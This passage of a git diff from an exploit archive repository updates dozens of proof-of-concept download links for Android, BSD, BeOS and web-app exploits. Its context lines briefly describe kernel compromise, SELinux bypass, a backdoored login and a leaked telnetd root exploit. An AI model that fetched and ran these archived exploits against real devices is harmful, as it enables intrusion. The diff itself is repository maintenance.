+++ b/exploits/android/dos/38612.txt @@ -37,4 +37,4 @@ To reproduce, download the image file and wait, or trigger media scanning by cal adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38612.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38612.zip \ No newline at end of file diff --git a/exploits/android/dos/38613.txt b/exploits/android/dos/38613.txt index f0c295f97..b5e0b66a8 100644 --- a/exploits/android/dos/38613.txt +++ b/exploits/android/dos/38613.txt @@ -28,4 +28,4 @@ To reproduce, download the file and open it in Gallery. This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38613.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38613.zip \ No newline at end of file diff --git a/exploits/android/dos/38614.txt b/exploits/android/dos/38614.txt index 7e4677e46..520ec6758 100644 --- a/exploits/android/dos/38614.txt +++ b/exploits/android/dos/38614.txt @@ -55,4 +55,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38614.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38614.zip \ No newline at end of file diff --git a/exploits/android/dos/39424.txt b/exploits/android/dos/39424.txt index 3eb9b593f..2eaa985b5 100644 --- a/exploits/android/dos/39424.txt +++ b/exploits/android/dos/39424.txt @@ -37,4 +37,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39424.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39424.zip \ No newline at end of file diff --git a/exploits/android/dos/39425.txt b/exploits/android/dos/39425.txt index 6c1a9d462..a6e4ec705 100644 --- a/exploits/android/dos/39425.txt +++ b/exploits/android/dos/39425.txt @@ -29,4 +29,4 @@ adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/she Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39425.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39425.zip \ No newline at end of file diff --git a/exploits/android/dos/39629.txt b/exploits/android/dos/39629.txt index 84c85d193..6c1195c87 100644 --- a/exploits/android/dos/39629.txt +++ b/exploits/android/dos/39629.txt @@ -159,4 +159,4 @@ prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqD Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39629.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39629.zip \ No newline at end of file diff --git a/exploits/android/dos/39651.txt b/exploits/android/dos/39651.txt index 208da0360..e46828aea 100644 --- a/exploits/android/dos/39651.txt +++ b/exploits/android/dos/39651.txt @@ -55,4 +55,4 @@ Reported to Android here: https://code.google.com/p/android/issues/detail?id=185 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39651.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39651.zip \ No newline at end of file diff --git a/exploits/android/dos/39685.txt b/exploits/android/dos/39685.txt index a0a3b457b..aca48cfce 100644 --- a/exploits/android/dos/39685.txt +++ b/exploits/android/dos/39685.txt @@ -42,4 +42,4 @@ Where XXXXXX should be uninitialized memory from the heap. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39685.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39685.zip \ No newline at end of file diff --git a/exploits/android/dos/39686.txt b/exploits/android/dos/39686.txt index 996239c91..787e1cdf2 100644 --- a/exploits/android/dos/39686.txt +++ b/exploits/android/dos/39686.txt @@ -86,4 +86,4 @@ I’ve provided a PoC which exploits the issue in ICrypto::decrypt. I will just Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39686.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39686.zip \ No newline at end of file diff --git a/exploits/android/dos/39921.txt b/exploits/android/dos/39921.txt index 6f5d531ab..d13519b78 100644 --- a/exploits/android/dos/39921.txt +++ b/exploits/android/dos/39921.txt @@ -92,4 +92,4 @@ cpsr 0x80070030 -2147024848 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39921.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39921.zip \ No newline at end of file diff --git a/exploits/android/dos/40381.txt b/exploits/android/dos/40381.txt index bfa92ca63..31ef21caa 100644 --- a/exploits/android/dos/40381.txt +++ b/exploits/android/dos/40381.txt @@ -140,4 +140,4 @@ If there is e.g. some system_app that performs permissions checks (which use the Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40381.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40381.zip \ No newline at end of file diff --git a/exploits/android/dos/40449.txt b/exploits/android/dos/40449.txt index 0bd49501d..bc0deb99a 100644 --- a/exploits/android/dos/40449.txt +++ b/exploits/android/dos/40449.txt @@ -36,4 +36,4 @@ Its logcat output looks like this: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40449.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40449.zip \ No newline at end of file diff --git a/exploits/android/dos/40515.txt b/exploits/android/dos/40515.txt index a46b4a3fb..5e9e042bf 100644 --- a/exploits/android/dos/40515.txt +++ b/exploits/android/dos/40515.txt @@ -142,4 +142,4 @@ a uint32_t is smaller than a binder_uintptr_t. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40515.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40515.zip \ No newline at end of file diff --git a/exploits/android/dos/40876.txt b/exploits/android/dos/40876.txt index 63008115b..dac712859 100644 --- a/exploits/android/dos/40876.txt +++ b/exploits/android/dos/40876.txt @@ -165,4 +165,4 @@ Fixed in the November security bulletin at https://source.android.com/security/b Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40876.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40876.zip \ No newline at end of file diff --git a/exploits/android/dos/40945.txt b/exploits/android/dos/40945.txt index dcbb39d1d..5159c9426 100644 --- a/exploits/android/dos/40945.txt +++ b/exploits/android/dos/40945.txt @@ -135,4 +135,4 @@ Fixed in https://source.android.com/security/bulletin/2016-12-01.html Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40945.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40945.zip \ No newline at end of file diff --git a/exploits/android/dos/40993.txt b/exploits/android/dos/40993.txt index e8bae8590..f2a7d8bf9 100644 --- a/exploits/android/dos/40993.txt +++ b/exploits/android/dos/40993.txt @@ -58,4 +58,4 @@ According to the default SELinux rules as present on the SM-G935F (version XXS1A Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40993.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40993.zip \ No newline at end of file diff --git a/exploits/android/dos/41161.txt b/exploits/android/dos/41161.txt index e8479316c..b85b565e2 100644 --- a/exploits/android/dos/41161.txt +++ b/exploits/android/dos/41161.txt @@ -67,4 +67,4 @@ The sysfs entries mentioned above are world-readable and have an SELinux context Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41161.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41161.zip \ No newline at end of file diff --git a/exploits/android/dos/41211.txt b/exploits/android/dos/41211.txt index 0dc40cd5e..14907a4b3 100644 --- a/exploits/android/dos/41211.txt +++ b/exploits/android/dos/41211.txt @@ -30,4 +30,4 @@ This PoC uses the CFP_ROPP_* commands to modify a kernel address in the kernel V Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41211.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41211.zip \ No newline at end of file diff --git a/exploits/android/dos/41212.txt b/exploits/android/dos/41212.txt index c9b727186..9caa1ebcb 100644 --- a/exploits/android/dos/41212.txt +++ b/exploits/android/dos/41212.txt @@ -38,4 +38,4 @@ This PoC disables the M bit in SCTLR_EL1. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41212.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41212.zip \ No newline at end of file diff --git a/exploits/android/dos/41218.txt b/exploits/android/dos/41218.txt index ea1c86b0e..6255737ec 100644 --- a/exploits/android/dos/41218.txt +++ b/exploits/android/dos/41218.txt @@ -44,4 +44,4 @@ This PoC s2-remaps RKP's physical address range and reads from it in EL1. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41218.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41218.zip \ No newline at end of file diff --git a/exploits/android/dos/41232.txt b/exploits/android/dos/41232.txt index 373f854f6..65ac07bdb 100644 --- a/exploits/android/dos/41232.txt +++ b/exploits/android/dos/41232.txt @@ -64,4 +64,4 @@ This PoC modifies an instruction within RKP's address space by repeatedly callin Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41232.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41232.zip \ No newline at end of file diff --git a/exploits/android/dos/41351.txt b/exploits/android/dos/41351.txt index 30e0c19b7..8458109d9 100644 --- a/exploits/android/dos/41351.txt +++ b/exploits/android/dos/41351.txt @@ -63,4 +63,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41351.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41351.zip \ No newline at end of file diff --git a/exploits/android/dos/41352.txt b/exploits/android/dos/41352.txt index 95195f314..8df92cd00 100644 --- a/exploits/android/dos/41352.txt +++ b/exploits/android/dos/41352.txt @@ -47,4 +47,4 @@ u:r:lghashstorageserver:s0 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41352.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41352.zip \ No newline at end of file diff --git a/exploits/android/dos/41353.txt b/exploits/android/dos/41353.txt index 90fbecce5..fac9ebcbb 100644 --- a/exploits/android/dos/41353.txt +++ b/exploits/android/dos/41353.txt @@ -92,4 +92,4 @@ disable selinux enforcement. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41353.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41353.zip \ No newline at end of file diff --git a/exploits/android/dos/41354.txt b/exploits/android/dos/41354.txt index 3a6b34e89..3088db99a 100644 --- a/exploits/android/dos/41354.txt +++ b/exploits/android/dos/41354.txt @@ -80,4 +80,4 @@ Here is a sample crash from a successful execution of the PoC: Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41354.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41354.zip \ No newline at end of file diff --git a/exploits/android/dos/41355.txt b/exploits/android/dos/41355.txt index 15ab641ff..b30eb28a6 100644 --- a/exploits/android/dos/41355.txt +++ b/exploits/android/dos/41355.txt @@ -97,4 +97,4 @@ Here is a sample crash from a successful execution of the PoC: Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41355.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41355.zip \ No newline at end of file diff --git a/exploits/android/dos/41981.txt b/exploits/android/dos/41981.txt index 249de65a9..652e8e136 100644 --- a/exploits/android/dos/41981.txt +++ b/exploits/android/dos/41981.txt @@ -79,4 +79,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41981.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41981.zip \ No newline at end of file diff --git a/exploits/android/dos/41982.txt b/exploits/android/dos/41982.txt index f2ee1ee46..173f51ecc 100644 --- a/exploits/android/dos/41982.txt +++ b/exploits/android/dos/41982.txt @@ -53,4 +53,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41982.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41982.zip \ No newline at end of file diff --git a/exploits/android/dos/41983.txt b/exploits/android/dos/41983.txt index d6722b993..28d0e9dbc 100644 --- a/exploits/android/dos/41983.txt +++ b/exploits/android/dos/41983.txt @@ -130,4 +130,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41983.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41983.zip \ No newline at end of file diff --git a/exploits/android/dos/42169.txt b/exploits/android/dos/42169.txt index d9b09e78c..dc0cdbcfc 100644 --- a/exploits/android/dos/42169.txt +++ b/exploits/android/dos/42169.txt @@ -61,4 +61,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42169.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42169.zip \ No newline at end of file diff --git a/exploits/android/dos/42170.txt b/exploits/android/dos/42170.txt index e1eaa3d95..0b7c7627c 100644 --- a/exploits/android/dos/42170.txt +++ b/exploits/android/dos/42170.txt @@ -77,4 +77,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42170.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42170.zip \ No newline at end of file diff --git a/exploits/android/dos/42171.txt b/exploits/android/dos/42171.txt index f53c33724..a50381c35 100644 --- a/exploits/android/dos/42171.txt +++ b/exploits/android/dos/42171.txt @@ -41,4 +41,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42171.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42171.zip \ No newline at end of file diff --git a/exploits/android/dos/42285.txt b/exploits/android/dos/42285.txt index 228890b77..a4bb3ef89 100644 --- a/exploits/android/dos/42285.txt +++ b/exploits/android/dos/42285.txt @@ -23,4 +23,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42285.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42285.zip \ No newline at end of file diff --git a/exploits/android/dos/43464.txt b/exploits/android/dos/43464.txt index f9f5d97a5..7be8c2521 100644 --- a/exploits/android/dos/43464.txt +++ b/exploits/android/dos/43464.txt @@ -83,4 +83,4 @@ The issue can also be exploited from the "isolated_app" SELinux context (and per Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43464.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43464.zip \ No newline at end of file diff --git a/exploits/android/dos/43513.txt b/exploits/android/dos/43513.txt index 3d094c2a8..bf5303858 100644 --- a/exploits/android/dos/43513.txt +++ b/exploits/android/dos/43513.txt @@ -92,4 +92,4 @@ These commands are all similarly racy (due to the getpidcon(...) usage), but are Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43513.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43513.zip \ No newline at end of file diff --git a/exploits/android/dos/43996.txt b/exploits/android/dos/43996.txt index 77665e8b9..76873e9f4 100644 --- a/exploits/android/dos/43996.txt +++ b/exploits/android/dos/43996.txt @@ -60,4 +60,4 @@ After applying the patch, the attached PoC should be built as part of the Androi Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43996.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43996.zip \ No newline at end of file diff --git a/exploits/android/dos/44268.txt b/exploits/android/dos/44268.txt index e063c6b86..de9867495 100644 --- a/exploits/android/dos/44268.txt +++ b/exploits/android/dos/44268.txt @@ -1,3 +1,3 @@ This Exploit allows arbitrary memory writes and reads. Running the specified payload within this package will write to the device's main CPU kernel, causing it to crash. More information about its origins here: http://boosterok.com/blog/broadpwn2/ -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44268.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44268.zip \ No newline at end of file diff --git a/exploits/android/dos/44724.txt b/exploits/android/dos/44724.txt index 0741f1d66..f8bcf829b 100644 --- a/exploits/android/dos/44724.txt +++ b/exploits/android/dos/44724.txt @@ -26,4 +26,4 @@ This was tested on Samsung build number NRD90M.G93FXXU1DQJ8, which is the most r Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44724.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44724.zip \ No newline at end of file diff --git a/exploits/android/local/39757.txt b/exploits/android/local/39757.txt index b76f6cb74..f649b280e 100644 --- a/exploits/android/local/39757.txt +++ b/exploits/android/local/39757.txt @@ -6,4 +6,4 @@ Qualcomm's Secure Execution Environment (QSEE) Privilege Escalation Exploit usi Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39757.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39757.zip \ No newline at end of file diff --git a/exploits/android/local/40066.txt b/exploits/android/local/40066.txt index d2ff52023..e184d15ce 100644 --- a/exploits/android/local/40066.txt +++ b/exploits/android/local/40066.txt @@ -227,4 +227,4 @@ the JACK server process. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40066.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40066.zip \ No newline at end of file diff --git a/exploits/android/local/41130.txt b/exploits/android/local/41130.txt index c61f105cc..2c5dd3d22 100644 --- a/exploits/android/local/41130.txt +++ b/exploits/android/local/41130.txt @@ -70,4 +70,4 @@ The high-level flow for executing a function in the kernel is the following: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41130.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41130.zip \ No newline at end of file diff --git a/exploits/android/local/41217.txt b/exploits/android/local/41217.txt index 4c63afc08..c3a3e46b6 100644 --- a/exploits/android/local/41217.txt +++ b/exploits/android/local/41217.txt @@ -92,4 +92,4 @@ This issue can be reproduced by simply writing code to any of these memory regio Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41217.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41217.zip \ No newline at end of file diff --git a/exploits/android/local/42601.txt b/exploits/android/local/42601.txt index a9d0d928a..eee53bd36 100644 --- a/exploits/android/local/42601.txt +++ b/exploits/android/local/42601.txt @@ -28,4 +28,4 @@ cedric:/ # Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42601.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42601.zip \ No newline at end of file diff --git a/exploits/android/local/45192.txt b/exploits/android/local/45192.txt index 5870332b8..ad9b5c598 100644 --- a/exploits/android/local/45192.txt +++ b/exploits/android/local/45192.txt @@ -344,4 +344,4 @@ and then interpreted, allowing the attacker to steal photos from the device Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45192.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45192.zip \ No newline at end of file diff --git a/exploits/android/local/45379.txt b/exploits/android/local/45379.txt index 4f04e88c6..2b99755bc 100644 --- a/exploits/android/local/45379.txt +++ b/exploits/android/local/45379.txt @@ -95,4 +95,4 @@ I have attached an exploit for the full chain, with usage instructions in USAGE. WARNING: As always, this exploit is intended to be used only on research devices that don't store user data. This specific exploit is known to sometimes cause data corruption. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45379.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45379.zip \ No newline at end of file diff --git a/exploits/android/local/9477.txt b/exploits/android/local/9477.txt index 5360d03a3..9ae0a02ba 100644 --- a/exploits/android/local/9477.txt +++ b/exploits/android/local/9477.txt @@ -1,6 +1,6 @@ Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. http://zenthought.org/content/file/android-root-2009-08-16-source -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9477.tar.gz (android-root-20090816.tar.gz) +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9477.tar.gz (android-root-20090816.tar.gz) # milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/exploits/android/remote/39640.txt b/exploits/android/remote/39640.txt index 6d531bfd0..5ba01f4bf 100644 --- a/exploits/android/remote/39640.txt +++ b/exploits/android/remote/39640.txt @@ -24,4 +24,4 @@ Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosti Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39640.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39640.zip \ No newline at end of file diff --git a/exploits/android/remote/40354.txt b/exploits/android/remote/40354.txt index dba0bb121..c02cc3c26 100644 --- a/exploits/android/remote/40354.txt +++ b/exploits/android/remote/40354.txt @@ -156,4 +156,4 @@ bool Parcel::enforceInterface(const String16& interface, Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40354.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40354.zip \ No newline at end of file diff --git a/exploits/android/remote/40874.txt b/exploits/android/remote/40874.txt index 37824d5ce..13d480f22 100644 --- a/exploits/android/remote/40874.txt +++ b/exploits/android/remote/40874.txt @@ -88,4 +88,4 @@ This notification will be of size THREAD_SIZE*2, and will therefore fill up the Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40874.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40874.zip \ No newline at end of file diff --git a/exploits/arm/dos/40182.txt b/exploits/arm/dos/40182.txt index 36df2fe8f..7cd37c627 100644 --- a/exploits/arm/dos/40182.txt +++ b/exploits/arm/dos/40182.txt @@ -78,4 +78,4 @@ I have attached a completely untested patch that should fix the x86, arm and arm Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40182.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40182.zip \ No newline at end of file diff --git a/exploits/asp/remote/15213.pl b/exploits/asp/remote/15213.pl index 1ad21065f..f88d0922e 100755 --- a/exploits/asp/remote/15213.pl +++ b/exploits/asp/remote/15213.pl @@ -10,7 +10,7 @@ # Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2. # A similar exploitation vector was also added lately in Padbuster v0.3: # http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/ -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15213.pl (padBuster.pl) +# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15213.pl (padBuster.pl) # # # Giorgio Fedon - (giorgio.fedon@mindedsecurity.com) diff --git a/exploits/asp/webapps/42776.txt b/exploits/asp/webapps/42776.txt index 03b49c6ec..40bad9ae3 100644 --- a/exploits/asp/webapps/42776.txt +++ b/exploits/asp/webapps/42776.txt @@ -10,4 +10,4 @@ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42776.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42776.zip \ No newline at end of file diff --git a/exploits/asp/webapps/8719.py b/exploits/asp/webapps/8719.py index 081d7cb1a..6cdc135db 100755 --- a/exploits/asp/webapps/8719.py +++ b/exploits/asp/webapps/8719.py @@ -15,7 +15,7 @@ # for working with this exploit you need two asp file for updating hash you can download both from : # www.abysssec.com/files/dana.zip -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/8719.zip (2009-dana.zip) +# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8719.zip (2009-dana.zip) # then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code diff --git a/exploits/beos/local/19840.txt b/exploits/beos/local/19840.txt index f0291f23f..669feaade 100644 --- a/exploits/beos/local/19840.txt +++ b/exploits/beos/local/19840.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1098/info A direct system call containing invalid parameters through int 0x25 will cause the BeOS to crash. Reboot of the machine is required in order to regain normal functionality. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19840.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19840.tgz \ No newline at end of file diff --git a/exploits/bsd/local/19411.txt b/exploits/bsd/local/19411.txt index 4a6bf4c40..8de597941 100644 --- a/exploits/bsd/local/19411.txt +++ b/exploits/bsd/local/19411.txt @@ -10,4 +10,4 @@ Hacker writes directly to device previously mounted as /usr, clearing file flags Hacker mounts modified device as /usr. Hacker installs backdoored /usr/bin/login. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19411.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19411.tgz \ No newline at end of file diff --git a/exploits/bsd/local/23655.txt b/exploits/bsd/local/23655.txt index d2a7a2513..3c0b9d06b 100644 --- a/exploits/bsd/local/23655.txt +++ b/exploits/bsd/local/23655.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9586/info A vulnerability has been reported to reside in the 'shmat()' system call used in the BSD kernel. Exploiting this issue may allow a local attacker to inject instructions into the memory of a privileged process. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23655.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23655.tar.gz \ No newline at end of file diff --git a/exploits/bsd/remote/19520.txt b/exploits/bsd/remote/19520.txt index 303f55feb..c28838232 100644 --- a/exploits/bsd/remote/19520.txt +++ b/exploits/bsd/remote/19520.txt @@ -3,7 +3,7 @@ This exploit was leaked on the Full Disclosure mailing list: http://seclists.org/fulldisclosure/2012/Jun/404 -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19520.zip +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19520.zip BSD telnetd Remote Root Exploit *ZERODAY* diff --git a/exploits/cgi/webapps/40272.txt b/exploits/cgi/webapps/40272.txt index e72cfb0f5..7984bda34 100644 --- a/exploits/cgi/webapps/40272.txt +++ b/exploits/cgi/webapps/40272.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40272.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40272.zip \ No newline at end of file diff --git a/exploits/cgi/webapps/40273.txt b/exploits/cgi/webapps/40273.txt index a910166b5..899dc8d31 100644 --- a/exploits/cgi/webapps/40273.txt +++ b/exploits/cgi/webapps/40273.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40273.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40273.zip \ No newline at end of file diff --git a/exploits/cgi/webapps/40274.txt b/exploits/cgi/webapps/40274.txt index fae01240b..1d757e8e9 100644 --- a/exploits/cgi/webapps/40274.txt +++ b/exploits/cgi/webapps/40274.txt @@ -5,4 +5,4 @@ Full Exploit: 